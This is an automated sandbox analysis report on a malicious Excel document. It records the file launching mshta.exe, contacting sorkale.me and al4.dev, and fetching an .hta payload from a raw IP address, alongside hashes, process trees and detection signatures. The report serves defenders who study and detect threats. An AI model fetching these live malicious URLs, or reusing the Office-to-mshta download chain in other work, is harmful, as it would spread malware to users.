Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Or_E7amento_US77.xla.xlsx

Overview

General Information

Sample name:Or_E7amento_US77.xla.xlsx
Analysis ID:1619095
MD5:d5e3d15713c6dc5089c44adea05e9d7c
SHA1:e60f17826909afb706efa612d176cfb82c8cca47
SHA256:ccdc8bb028dfd5bdc418ce46e263bccf983efe6df83a239974af973059561902
Tags:xlsxuser-Porcupine
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 7520 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 7292 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 916 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 3096 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Or_E7amento_US77.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7520, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 7292, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 104.21.87.137, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7520, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49759
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49759, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7520, Protocol: tcp, SourceIp: 104.21.87.137, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Or_E7amento_US77.xla.xlsxReversingLabs: Detection: 21%
Source: Or_E7amento_US77.xla.xlsxVirustotal: Detection: 23%Perma Link
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 104.21.87.137:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49770 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: sorkale.me
Source: global trafficDNS query: name: al4.dev
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 104.21.87.137:443 -> 192.168.2.4:49759
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 104.21.87.137:443 -> 192.168.2.4:49759
Source: global trafficTCP traffic: 104.21.87.137:443 -> 192.168.2.4:49759
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 104.21.87.137:443 -> 192.168.2.4:49759
Source: global trafficTCP traffic: 104.21.87.137:443 -> 192.168.2.4:49759
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 104.21.87.137:443 -> 192.168.2.4:49759
Source: global trafficTCP traffic: 104.21.87.137:443 -> 192.168.2.4:49759
Source: global trafficTCP traffic: 104.21.87.137:443 -> 192.168.2.4:49759
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 104.21.87.137:443
Source: global trafficTCP traffic: 104.21.87.137:443 -> 192.168.2.4:49759
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.4:49770
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.4:49770
Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.4:49770
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.4:49770
Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.4:49770
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.4:49770
Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.4:49770
Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.4:49770
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 192.168.2.4:49770 -> 188.114.97.3:443
Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.4:49770
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 198.46.177.136:80 -> 192.168.2.4:49776
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: global trafficTCP traffic: 192.168.2.4:49776 -> 198.46.177.136:80
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewIP Address: 198.46.177.136 198.46.177.136
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global trafficHTTP traffic detected: GET /GsWz6D HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sorkale.meConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Lj3tCg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: al4.dev
Source: global trafficHTTP traffic detected: GET /xampp/konno/ko/sweetbabygirllovedmeperfectlygivemebestloverevers.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 198.46.177.136
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.136
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.136
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.136
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.136
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.136
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.136
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.136
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.136
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.136
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.136
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.136
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.136
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.136
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.136
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.136
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.136
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /GsWz6D HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sorkale.meConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Lj3tCg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: al4.dev
Source: global trafficHTTP traffic detected: GET /xampp/konno/ko/sweetbabygirllovedmeperfectlygivemebestloverevers.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 198.46.177.136
Source: global trafficDNS traffic detected: DNS query: sorkale.me
Source: global trafficDNS traffic detected: DNS query: al4.dev
Source: Or_E7amento_US77.xla.xlsxString found in binary or memory: https://sorkale.me/GsWz6Dj
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownHTTPS traffic detected: 104.21.87.137:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49770 version: TLS 1.2

System Summary

barindex
Source: Or_E7amento_US77.xla.xlsxOLE: Microsoft Excel 2007+
Source: Or_E7amento_US77.xla.xlsxOLE: Microsoft Excel 2007+
Source: Or_E7amento_US77.xla.xlsxOLE indicator, VBA macros: true
Source: Or_E7amento_US77.xla.xlsxStream path 'MBD001CFA11/\x1Ole' : https://sorkale.me/GsWz6Dj}ps>$qHcJNt8uR|O!}'2:I,JMUG<+.u{k@AaWsu}#s_*Rn^~/-uNEG! ]gb6!@EC,dz2 `9{ad`aP'kAQIy6du2pZgEOJcDKRLprNi8xbPHef7Ys5ODj2ylbF6S7WmWsmtcDTgaDLMTt2zUzFPlkXlpwIB6A0R1xGldIyTpbbyGREna2vVkcwImypo7t}n[0B/it1,bT]<%8~
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'or_e7amento_us77.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal60.expl.winXLSX@6/4@2/3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Or_E7amento_US77.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{E1C2AAD9-9053-46FA-9ADF-74B03C1D8E31} - OProcSessId.datJump to behavior
Source: Or_E7amento_US77.xla.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Or_E7amento_US77.xla.xlsxReversingLabs: Detection: 21%
Source: Or_E7amento_US77.xla.xlsxVirustotal: Detection: 23%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Or_E7amento_US77.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: Or_E7amento_US77.xla.xlsxStatic file information: File size 1209856 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: Or_E7amento_US77.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Or_E7amento_US77.xla.xlsxStream path 'MBD001CFA10/MBD001E046E/Package' entropy: 7.99321336902 (max. 8.0)
Source: Or_E7amento_US77.xla.xlsxStream path 'Workbook' entropy: 7.98957384119 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 922Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
